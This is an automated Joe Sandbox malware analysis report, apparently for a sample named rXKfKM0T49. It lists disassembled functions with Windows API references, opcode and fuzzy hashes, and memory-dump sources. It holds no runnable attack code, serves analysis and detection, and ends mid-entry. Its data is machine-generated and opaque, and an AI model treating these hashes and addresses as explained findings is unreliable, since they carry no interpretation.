                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                            Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,00437800,76F92EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$\*.*
                                                                                                            • API String ID: 2035342205-351390296
                                                                                                            • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                            Function 378AE790 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: D
                                                                                                            • API String ID: 0-2746444292
                                                                                                            • Opcode ID: 5b73389e57a4b6f10820555485e19a1a6c66189bc0adb15f369c3bd1bfbe2cd4
                                                                                                            • Instruction ID: 02f9e8e457ee530a3400fdc972bc1bc55d197bfb58df35d134f071b615c39050
                                                                                                            • Opcode Fuzzy Hash: 5b73389e57a4b6f10820555485e19a1a6c66189bc0adb15f369c3bd1bfbe2cd4
                                                                                                            • Instruction Fuzzy Hash: 8EB1CD74E00358CFDB54DFA4C994BADBBB2AF49300F6081A9D819AB351DB35AE81CF51
                                                                                                            Function 384E7B62 Relevance: .6, Instructions: 595COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 358c2e299f0cc3fa87130c364767876f2ebb43ee0ea42f9e701386b2aeb62912
                                                                                                            • Instruction ID: 55ca2ff09ee5f9e4875febb8e846ec2a3614b0d84fe9c8fb62c73ff45a396def
                                                                                                            • Opcode Fuzzy Hash: 358c2e299f0cc3fa87130c364767876f2ebb43ee0ea42f9e701386b2aeb62912
                                                                                                            • Instruction Fuzzy Hash: 5D529C74E01228CFDB64DF65C984B9DBBB2BB89301F5081EAE409A7355DB35AE81CF50
                                                                                                            Function 378AB930 Relevance: .3, Instructions: 278COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0b0aa878f0b73eb2a9fdd43bbea325435f1d7300f4299ec4360b73fba23d535b
                                                                                                            • Instruction ID: 7a32e976ed71d30973443c4f9ebab9ad8cf025e623ef36df4449645eb2b0b8fe
                                                                                                            • Opcode Fuzzy Hash: 0b0aa878f0b73eb2a9fdd43bbea325435f1d7300f4299ec4360b73fba23d535b
                                                                                                            • Instruction Fuzzy Hash: 01D1D174E00218CFDB54DFA9C994BADBBB2AF89300F5080A9D419AB355DB355E85CF50
                                                                                                            Function 378AB07F Relevance: .3, Instructions: 276COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 400f13c2c91b484ca2770e292b3d2519d330662bb96d2e788ba19f30e598fd65
                                                                                                            • Instruction ID: d3b4a6d9cfec2e99e7006e1bf5e722b3f17d9bf08d90cd673e62c276cb4bab84
                                                                                                            • Opcode Fuzzy Hash: 400f13c2c91b484ca2770e292b3d2519d330662bb96d2e788ba19f30e598fd65
                                                                                                            • Instruction Fuzzy Hash: 9FD1E274E00318CFDB54DFA9C994B9DBBB2AF89300F5080A9D819AB355DB359E81CF11
                                                                                                            Function 378ADEE1 Relevance: .3, Instructions: 275COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 672bf20af3226ae7ef91fef304f3138c99d7792f84d7f6793bece0648591fa8e
                                                                                                            • Instruction ID: e4e99190fc42c00ad17794857fc9611af2a3c4cd435dfb8248f70410af8f8dfd
                                                                                                            • Opcode Fuzzy Hash: 672bf20af3226ae7ef91fef304f3138c99d7792f84d7f6793bece0648591fa8e
                                                                                                            • Instruction Fuzzy Hash: 73C1D074E00318CFEB54DFA5C994BADBBB2AF89300F5080A9D419AB355DB359E85CF50
                                                                                                            Function 378ADA89 Relevance: .3, Instructions: 272COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e0ce74520a5f55e09a46f8d31e58cd0a817362a05c0627381458371064bd8dd5
                                                                                                            • Instruction ID: 0aa1813f091ca0ed2e674b2b1da61593e6a3218d877aedf73a022c0d142ec3e4
                                                                                                            • Opcode Fuzzy Hash: e0ce74520a5f55e09a46f8d31e58cd0a817362a05c0627381458371064bd8dd5
                                                                                                            • Instruction Fuzzy Hash: AFC1DF74E00218CFEB54DFA5C994BADBBB2AF89300F5080A9D819BB355DB359E81CF10
                                                                                                            Function 384E1858 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2d0fbcb514183dda21a3be0a147f9d06384e832cbf49230955a43c29c74756cd
                                                                                                            • Instruction ID: e24052a3b42d51c8b7446a83015b671ba55f596389a8a5556143a2055149086f
                                                                                                            • Opcode Fuzzy Hash: 2d0fbcb514183dda21a3be0a147f9d06384e832cbf49230955a43c29c74756cd
                                                                                                            • Instruction Fuzzy Hash: F3C1C074E00318CFDB54DFA5C994BADBBB2AF89301F5080A9D419AB355DB359E81CF11
                                                                                                            Function 384E7070 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b46805f04960237ed121ebc879f99fe7f4e9663ce75ea4d6c32d5edee121abc2
                                                                                                            • Instruction ID: 69332144d4416a2358c884f4a7b252f5cbd93b280712e480cf6c7940ee617a27
                                                                                                            • Opcode Fuzzy Hash: b46805f04960237ed121ebc879f99fe7f4e9663ce75ea4d6c32d5edee121abc2
                                                                                                            • Instruction Fuzzy Hash: ABC1DF74E00318CFDB54DFA5C994BADBBB2AF89301F6080A9D819AB355DB359E81CF50
                                                                                                            Function 384E4820 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: df07be5ef96dd6f1b908e9580d93c718262498707d8d3b7347f595955192e324
                                                                                                            • Instruction ID: 47180b3ffa6baf01d65abe87aa57cb8127d25f2b5fe6fcce175566fb391bcb34
                                                                                                            • Opcode Fuzzy Hash: df07be5ef96dd6f1b908e9580d93c718262498707d8d3b7347f595955192e324
                                                                                                            • Instruction Fuzzy Hash: CBC1DF74E00318CFDB54DFA5C994BADBBB2AF89300F5080A9D819AB365DB355E85CF50
                                                                                                            Function 384E2108 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a54949a7ef00ed32a80cbe5b1725978235e079689afb90b1913665c6cdb327c2
                                                                                                            • Instruction ID: 53d9ad7a34920afd64b418245f3b9883271743e053ad30edae6c59904f1406d0
                                                                                                            • Opcode Fuzzy Hash: a54949a7ef00ed32a80cbe5b1725978235e079689afb90b1913665c6cdb327c2
                                                                                                            • Instruction Fuzzy Hash: 9AC1BF74E00218CFEB54DFA5C994BADBBB2BF89301F5080A9D419AB355DB359E81CF11
                                                                                                            Function 384E29B8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd7f9607a1f92d13ef9250ae293576ec9169f7eaec8fe3d4f8c24349186fcf80
                                                                                                            • Instruction ID: c4925e216aa9b903673c1a1e62c07d02d8d17d118dd504e8c64bebae7ecdaf58
                                                                                                            • Opcode Fuzzy Hash: dd7f9607a1f92d13ef9250ae293576ec9169f7eaec8fe3d4f8c24349186fcf80
                                                                                                            • Instruction Fuzzy Hash: CBC1CE74E00218CFDB54DFA9C994B9DBBB2BF89300F6080A9D419AB355DB359E81CF11
                                                                                                            Function 384E3268 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b6ed3052e25069d49e34d4c024e76696df40a161a1d52858a0c2bba01d92f60e
                                                                                                            • Instruction ID: 2f48018da7641b83314e109801c5deb596d69389746963ecf8a504bd6c45f36a
                                                                                                            • Opcode Fuzzy Hash: b6ed3052e25069d49e34d4c024e76696df40a161a1d52858a0c2bba01d92f60e
                                                                                                            • Instruction Fuzzy Hash: A3C1D074E00318CFDB54DFA5C994B9DBBB2AF89300F6080A9D419AB355EB359E81CF11
                                                                                                            Function 384E5208 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7fa34da69227a6602f4c734a49d7273e750b43f05f9c1b99cde27e84b43cd792
                                                                                                            • Instruction ID: dcfa5313b7b32c75a0253732cdc0dbb155cf9d607c41e3b76835e686b018bd9a
                                                                                                            • Opcode Fuzzy Hash: 7fa34da69227a6602f4c734a49d7273e750b43f05f9c1b99cde27e84b43cd792
                                                                                                            • Instruction Fuzzy Hash: 59C1CF74E00318CFDB54DFA5C994BADBBB2AF89301F6080A9D819AB355DB359E85CF10
                                                                                                            Function 384E5AB8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b5bfefa6810ee6639bf13063185004f334f8ba3a323915286f9cab73aa92095e
                                                                                                            • Instruction ID: d396a6cd9760a3014ffb2424f17696b8c4025717af176a3f7a5d872bd4a32d41
                                                                                                            • Opcode Fuzzy Hash: b5bfefa6810ee6639bf13063185004f334f8ba3a323915286f9cab73aa92095e
                                                                                                            • Instruction Fuzzy Hash: 20C1DF74E00318CFDB54DFA9C994B9DBBB2AF89301F6080A9D819AB355DB359E81CF11
                                                                                                            Function 384E6368 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a6b192852ea28416b03685bb183e6bec5168067cef9a1c790ba775d486803626
                                                                                                            • Instruction ID: dc6053dde240e898acd224b66ea403c1b41b30088777479ddd031d3659ee1eb9
                                                                                                            • Opcode Fuzzy Hash: a6b192852ea28416b03685bb183e6bec5168067cef9a1c790ba775d486803626
                                                                                                            • Instruction Fuzzy Hash: AFC1D074E00318CFDB54DFA5C994B9DBBB2AF89300F5080A9D419AB355DB359E81CF51
                                                                                                            Function 384E3B18 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 297310a7edd1ffcf6fb0b25588e4fdae3abbf1e99d4a3584e34d30bf975a60af
                                                                                                            • Instruction ID: 721b123736ab33b1c0001591f74055257c45b7cd0746772a6b5e9822417e8ea8
                                                                                                            • Opcode Fuzzy Hash: 297310a7edd1ffcf6fb0b25588e4fdae3abbf1e99d4a3584e34d30bf975a60af
                                                                                                            • Instruction Fuzzy Hash: 68C1D074E00318CFDB54DFA9C994BADBBB2AF89300F5080A9D419AB355EB359E81CF51
                                                                                                            Function 384E43C8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 926963f8bbd090c34cee3e3599718d90b6459e781dfa34608d54cb8bc7d220c3
                                                                                                            • Instruction ID: a94b819275fd3990dda1301530e960cfb7dbc352fab636331f1698bbe395164b
                                                                                                            • Opcode Fuzzy Hash: 926963f8bbd090c34cee3e3599718d90b6459e781dfa34608d54cb8bc7d220c3
                                                                                                            • Instruction Fuzzy Hash: 4DC1CF74E00218CFDB54DFA5C994B9DBBB2AF89301F5080A9D819AB355DB359E81CF50
                                                                                                            Function 384E1400 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37a7fb93fdee69040262b4a792ee0f20341c2dae4e5a1a22170682d622f324ba
                                                                                                            • Instruction ID: 44ffab1822f91671fb177c3e5a45f34383fc02416e66b5e486ad10ca11d0ea2f
                                                                                                            • Opcode Fuzzy Hash: 37a7fb93fdee69040262b4a792ee0f20341c2dae4e5a1a22170682d622f324ba
                                                                                                            • Instruction Fuzzy Hash: B4C1CF74E00218CFDB54DFA5C994BADBBB2BF89301F6080A9D819AB355DB359E81CF11
                                                                                                            Function 384E6C18 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1baad0086b8fa131016f09700b9cbc6617c669712a6b2dd9c56e47625f758ea4
                                                                                                            • Instruction ID: 102f05716c746088338c3f1693d8a7dec1de091de949d0356e84744d06bfcdc1
                                                                                                            • Opcode Fuzzy Hash: 1baad0086b8fa131016f09700b9cbc6617c669712a6b2dd9c56e47625f758ea4
                                                                                                            • Instruction Fuzzy Hash: D3C1D074E00318CFEB54DFA9C994BADBBB2AF89301F5080A9D419AB355DB359E81CF10
                                                                                                            Function 384E74C8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6f09ff109aa11069db4fbb6fa67e93a99cb33a1fea041c859472337fa6a38fc5
                                                                                                            • Instruction ID: 89b5e6e733f04391d9abe9a7dfc1786b108e5083d15788b7c7444e89fd5c2647
                                                                                                            • Opcode Fuzzy Hash: 6f09ff109aa11069db4fbb6fa67e93a99cb33a1fea041c859472337fa6a38fc5
                                                                                                            • Instruction Fuzzy Hash: 61C1CF74E00218CFEB54DFA5C994B9DBBB2BF89301F5080A9D419AB355DB355E81CF10
                                                                                                            Function 384E1CB0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5bee7f2d75b8742a3071fd0057514bddbbd3c252dd1a165e16303d287f41790
                                                                                                            • Instruction ID: 3bb106dff5b08cc74b7346e5c24754250254e3fe353f3fc4076644403289891d
                                                                                                            • Opcode Fuzzy Hash: d5bee7f2d75b8742a3071fd0057514bddbbd3c252dd1a165e16303d287f41790
                                                                                                            • Instruction Fuzzy Hash: 8FC1D074E00318CFDB54DFA9C994B9DBBB2AF89301F5080A9D819AB355DB355E81CF50
                                                                                                            Function 384E2560 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c0ad0bcf082bfd66774fde03558a7e12c3a306e1f0f3f96ba6e6df4d130f8b4
                                                                                                            • Instruction ID: 9b4afda1d28909a15cc75ac37b5f6bdc82868683ae67aa918275cf944a1bb7f3
                                                                                                            • Opcode Fuzzy Hash: 2c0ad0bcf082bfd66774fde03558a7e12c3a306e1f0f3f96ba6e6df4d130f8b4
                                                                                                            • Instruction Fuzzy Hash: 4CC1D074E00318CFDB54DFA5C994BADBBB2AF89301F5080A9D819AB355DB359E81CF50
                                                                                                            Function 384E4DB0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
